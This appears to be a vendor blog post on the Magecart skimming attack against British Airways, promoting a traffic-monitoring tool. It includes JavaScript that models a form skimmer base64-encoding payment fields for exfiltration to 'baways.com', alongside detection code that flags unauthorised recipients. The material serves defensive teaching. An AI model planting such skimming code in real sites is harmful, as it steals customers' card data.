Protect your e-commerce site from Magecart attacks: learn from the British Airways and Newegg breaches


E-commerce sites worldwide face a growing risk from the threat group Magecart, which carries out simple but effective JavaScript skimming attacks on online payment forms. High-profile reported victims include Ticketmaster, British Airways and Newegg; there are likely to be many more sites compromised without their knowledge.

The British Airways hack demonstrated just how vulnerable companies, even big household names, can be: the names, addresses, email addresses, credit card numbers and CVV authentication numbers of up to 380,000 customers were quietly siphoned off over a roughly two-week period beginning in late August 2018. British Airways certainly takes data privacy seriously, which shows how exposed an online property can be without regular processes that monitor its infrastructure and report back weaknesses in its IT defences.

For anyone regularly dealing with online risk, privacy and data protection, keeping customers' data safe is a top priority. With the right tools, British Airways could have recognised and stopped the hack well before it became a severe breach, something the data monitoring and validation tool DataTrue could have done through automated data assurance.

However, first – how did the hackers break past British Airways’ defences?

The data breach began on the 21st of August and was a simple heist: data entered on the website and mobile app payment pages was copied and sent to a third-party server operated by the attackers.

The attackers did not need to break into the back-end systems that process payments; the card data was stolen in the customer's browser. They achieved this by modifying a JavaScript library served from the British Airways website itself (the RiskIQ analysis identifies a tampered copy of the Modernizr library, loaded on the baggage claim information page among others) and adding a short skimming script to it.

As a result, whenever a customer submitted the payment form on a page that loaded the tampered library, the script collected the names, card numbers and CVV numbers entered and sent them to the attackers' domain "baways.com", with no one the wiser for about two weeks, allowing the attackers to accrue the payment details of roughly 380,000 customers. The RiskIQ team have published a more comprehensive analysis of how the hack was perpetrated.

How DataTrue can detect Magecart attacks

DataTrue automatically tests the data your site is collecting and exposing to third-party data processors. DataTrue tests can be scheduled to run hourly, and before and after every code or content deployment.


In the case of British Airways, a DataTrue test persona (a fictitious customer whose personal and card details are known in advance) would have gone to the website, begun a transaction, filled out the payment form and clicked submit. As this happens, the malicious JavaScript would have executed and, because the test browser runs through DataTrue's proxy servers, its request to the fake "baways.com" would have passed through the proxy alongside the legitimate ones.

At this point DataTrue would have matched the string patterns defined for the persona against the traffic going through the proxy servers, including the request to the hackers' website, and generated a report of what data was exposed and to which website or data processor.

DataTrue would have identified the hackers' website as a non-authorised data processor and alerted the British Airways team to the hack. Contact us to find out more about how DataTrue can automatically validate and protect your data.
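To make both halves of the story concrete, here is an added example in JavaScript. It is not DataTrue's product code and not the skimmer RiskIQ recovered from the British Airways site; it models a toy form skimmer that serialises a form and beacons it to an external domain, and the persona-based check described above, which looks for the persona's values in proxied requests (decoding URL-encoded and base64 bodies, since skimmers rarely send plaintext) and flags any destination that is not an authorised data processor. The hostnames, paths, persona values and the captured traffic are constructed for the example.

```javascript
'use strict';
// Added example: a toy Magecart-style skimmer and a persona-based check
// over proxied traffic. Not DataTrue's code and not the RiskIQ-analysed
// skimmer; hostnames, paths, persona values and traffic are constructed.

// Test persona: a fictitious customer whose values are distinctive enough
// that seeing them in outbound traffic cannot be a coincidence.
const PERSONA = {
  name: 'Persona Seventeen',
  email: 'persona17@datatrue-test.invalid',
  card: '4111111111111111', // well-known test PAN, never a real card
  cvv: '937',               // 3 digits match by chance; corroboration only
};

// Data processors this site may legitimately send checkout data to (constructed).
const AUTHORISED_PROCESSORS = new Set(['shop.example.com', 'psp.example.net']);

// ---- The attack: what a form skimmer does --------------------------------
// In a browser the skimmer hooks the submit button, reads every field of the
// form and beacons them to a domain the attackers control. The form is a
// plain object here so the example runs under Node without a DOM.
function skimForm(fields, exfilUrl) {
  const serialised = JSON.stringify(fields);
  return {
    method: 'POST',
    url: exfilUrl,
    // Encoding the body is a common trick to defeat naive string matching.
    body: Buffer.from(serialised, 'utf8').toString('base64'),
  };
}

// ---- The detection: persona strings in proxied traffic -------------------
// Candidate plaintexts for a request body: as sent, URL-decoded, base64-decoded.
function candidateDecodings(body) {
  const out = [body];
  try { out.push(decodeURIComponent(body.replace(/\+/g, ' '))); } catch (_) { /* not URL-encoded */ }
  if (/^[A-Za-z0-9+/=]+$/.test(body) && body.length % 4 === 0) {
    out.push(Buffer.from(body, 'base64').toString('utf8'));
  }
  return out;
}

// Which persona fields appear in this request (body or URL)? Whitespace is
// also stripped before matching, since forms often group PAN digits.
function personaFieldsIn(request, persona) {
  const texts = candidateDecodings(request.body || '').concat(request.url);
  const found = [];
  for (const [field, value] of Object.entries(persona)) {
    if (texts.some((t) => t.includes(value) || t.replace(/\s/g, '').includes(value))) {
      found.push(field);
    }
  }
  return found;
}

// Scan every captured request and record where persona data went.
function findPersonaLeaks(requests, persona, authorised) {
  const findings = [];
  for (const req of requests) {
    const fields = personaFieldsIn(req, persona);
    if (fields.length === 0) continue;
    const host = new URL(req.url).hostname;
    findings.push({ host, fields, authorised: authorised.has(host) });
  }
  return findings;
}

// Constructed capture of what the proxy sees during one scripted checkout:
// first-party checkout, payment processor, analytics beacon, and the skimmer.
function sampleTraffic() {
  return [
    { method: 'POST', url: 'https://shop.example.com/checkout',
      body: 'name=Persona+Seventeen&email=persona17%40datatrue-test.invalid' },
    { method: 'POST', url: 'https://psp.example.net/tokenize',
      body: JSON.stringify({ pan: '4111 1111 1111 1111', cvv: '937' }) },
    { method: 'GET', url: 'https://analytics.example.org/collect?page=checkout', body: '' },
    skimForm(PERSONA, 'https://baways.com/gateway'),
  ];
}

// Findings for hosts that are not authorised processors are the alerts.
function runCheck() {
  return findPersonaLeaks(sampleTraffic(), PERSONA, AUTHORISED_PROCESSORS)
    .filter((f) => !f.authorised);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of findPersonaLeaks(sampleTraffic(), PERSONA, AUTHORISED_PROCESSORS)) {
    console.log(`${f.authorised ? 'ok   ' : 'ALERT'} ${f.host} received ${f.fields.join(', ')}`);
  }
}
```

Run with `node skimcheck.js`: the checkout and processor requests are reported as authorised, the analytics beacon carries no persona data and is ignored, and the base64-encoded request to baways.com is the one alert. Two caveats apply to any check of this kind: it only sees traffic the scripted persona triggers, so a skimmer that activates only for particular geographies, devices or sessions is missed unless the persona runs cover them; and short values such as a 3-digit CVV match by chance, so alerts should key on the unique email address and test card number.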

